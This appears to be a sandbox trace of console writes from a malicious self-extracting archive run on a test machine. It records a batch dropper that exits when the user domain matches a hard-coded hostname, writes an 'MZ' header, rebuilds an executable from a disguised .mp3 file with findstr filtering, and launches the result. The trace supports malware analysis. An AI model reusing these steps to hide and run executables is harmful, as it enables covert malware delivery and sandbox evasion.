WriteConsoleW
|
buffer:
Microsoft Windows [Version 6.1.7601]
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Set aoSCTEs=%userdomain%
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Set //String2//=DESKTOP-QO5QU33
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
The syntax of the command is incorrect.
console_handle:
0x0000000b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
if %aoSCTEs%==%//String2//% exit
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
<nul set /p = "MZ" > Ammirabile.exe.com
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
findstr /V /R "^VHxFkTKzklMPCtSumZgtoIXuqMkLYwTAlnvenkTAxMprPQZQFATAsmxjKhFmHYcpskFtHQHguOKvmUspMxuniapKtlskGzSvdqLDlVoPSFxCPXNQWcNjSWw$" Divino.mp3 >> Ammirabile.exe.com"
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
copy Pei.mp3 o
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
1 file(s) copied.
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
start Ammirabile.exe.com o
console_handle:
0x00000007
|
1
|
1 |
0
|